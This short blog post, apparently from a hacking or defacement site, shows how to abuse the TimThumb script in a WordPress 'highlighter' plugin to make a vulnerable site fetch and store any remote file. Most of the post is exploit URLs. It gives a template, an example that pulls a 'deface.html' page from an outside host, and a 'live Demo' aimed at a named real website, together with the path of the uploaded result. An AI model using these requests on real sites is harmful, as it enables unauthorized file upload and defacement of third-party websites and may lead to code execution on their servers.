Wordpress timthumb remote file upload Vulnerability

wordpress timthumb remote file upload Vulnerability

in this Vulnerability you can include any file (every format allowed)on Vulnerable wrdpress website
this bug known as "timthumb.php" exploit
exploithttp://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://websiteite.com/anyfile.fileformat
example :  http://wordpresssite.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://www.devilscafe.in/deface.html
after acessing this url that file will upload on website remotly on website
to view your uploaded file goto :
http://wordpresssite.com/wp-content/plugins/highlighter/libs/temp/yourfilehere
(file will upload with a random name like fe0555b78d04cb3c76cff7e10cf05b77, check last file to view your file)
live Demo : http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/timthumb.php?src=http://pastehtml.com/view/btuwhb6nl.html
Result :http://www.currentlyobsessed.com/wp-content/plugins/highlighter/libs/temp/1dc2c9907ce70a6ed472bbb1cad3cf71.html

This entry was posted in

    Category

    Category

    Category